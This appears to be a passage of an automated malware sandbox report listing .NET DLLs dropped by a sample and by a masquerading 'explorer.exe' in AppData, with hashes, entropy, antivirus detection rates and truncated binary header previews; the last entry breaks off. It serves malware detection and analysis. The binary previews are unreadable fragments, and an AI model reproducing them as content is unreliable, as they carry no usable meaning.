                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                      C:\Users\user\Desktop\FBkUkkGT.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32768
                                                      Entropy (8bit):5.645950918301459
                                                      Encrypted:false
                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\FZhLDyOY.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32768
                                                      Entropy (8bit):5.645950918301459
                                                      Encrypted:false
                                                      SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                      MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                      SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                      SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                      SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../6.d...........!.....x............... ........@.. ..............................<.....@....................................W.................................................................................... ............... ..H............text...4v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B........................H........e..L0...........c......................................................................................................................................................................o.<.....r%.2.D..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\FnPmnTXV.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):34816
                                                      Entropy (8bit):5.636032516496583
                                                      Encrypted:false
                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\GWITZydS.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):36352
                                                      Entropy (8bit):5.668291349855899
                                                      Encrypted:false
                                                      SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                      MD5:94DA5073CCC14DCF4766DF6781485937
                                                      SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                      SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                      SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\GzLcGkVO.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):41472
                                                      Entropy (8bit):5.6808219961645605
                                                      Encrypted:false
                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\HzZUtpuN.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):70144
                                                      Entropy (8bit):5.909536568846014
                                                      Encrypted:false
                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\LmdbigkC.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):39936
                                                      Entropy (8bit):5.629584586954759
                                                      Encrypted:false
                                                      SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                      MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                      SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                      SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                      SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\QhesqMaw.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):34816
                                                      Entropy (8bit):5.636032516496583
                                                      Encrypted:false
                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...v..d...........!..................... ........@.. ...............................[....@.................................l...O.................................................................................... ............... ..H............text....~... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........b...;...........a.......................................................................................................................................................................k.X...=.%Cu..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\QwEjYoPD.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):34304
                                                      Entropy (8bit):5.618776214605176
                                                      Encrypted:false
                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\SSKIxalp.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):36352
                                                      Entropy (8bit):5.668291349855899
                                                      Encrypted:false
                                                      SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                      MD5:94DA5073CCC14DCF4766DF6781485937
                                                      SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                      SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                      SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\SVwsOfwt.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):39936
                                                      Entropy (8bit):5.629584586954759
                                                      Encrypted:false
                                                      SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                      MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                      SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                      SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                      SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\TkfSyAEq.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):294912
                                                      Entropy (8bit):6.010605469502259
                                                      Encrypted:false
                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                      C:\Users\user\Desktop\TmvagkQx.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):38400
                                                      Entropy (8bit):5.699005826018714
                                                      Encrypted:false
                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                      MD5:87765D141228784AE91334BAE25AD743
                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\TvSaQXjt.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):50176
                                                      Entropy (8bit):5.723168999026349
                                                      Encrypted:false
                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\UJAAAsrr.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):41472
                                                      Entropy (8bit):5.6808219961645605
                                                      Encrypted:false
                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.................... ........@.. ....................................@.................................x...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........s...D...........r............................................................................................................................................................................9..A..%+..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\UOyjNWIs.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):40448
                                                      Entropy (8bit):5.7028690200758465
                                                      Encrypted:false
                                                      SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                      MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                      SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                      SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                      SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\UPlQSaAj.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33280
                                                      Entropy (8bit):5.634433516692816
                                                      Encrypted:false
                                                      SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                      MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                      SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                      SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                      SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\WJAzEWli.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):34304
                                                      Entropy (8bit):5.618776214605176
                                                      Encrypted:false
                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\aIOpvFFY.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):294912
                                                      Entropy (8bit):6.010605469502259
                                                      Encrypted:false
                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                      C:\Users\user\Desktop\bqhiOmsd.log

                                                      Download File
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):46592
                                                      Entropy (8bit):5.870612048031897
                                                      Encrypted:false
                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                      C:\Users\user\Desktop\bvfQbQIf.log

                                                      Download File
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):126976
                                                      Entropy (8bit):6.057993947082715
                                                      Encrypted:false
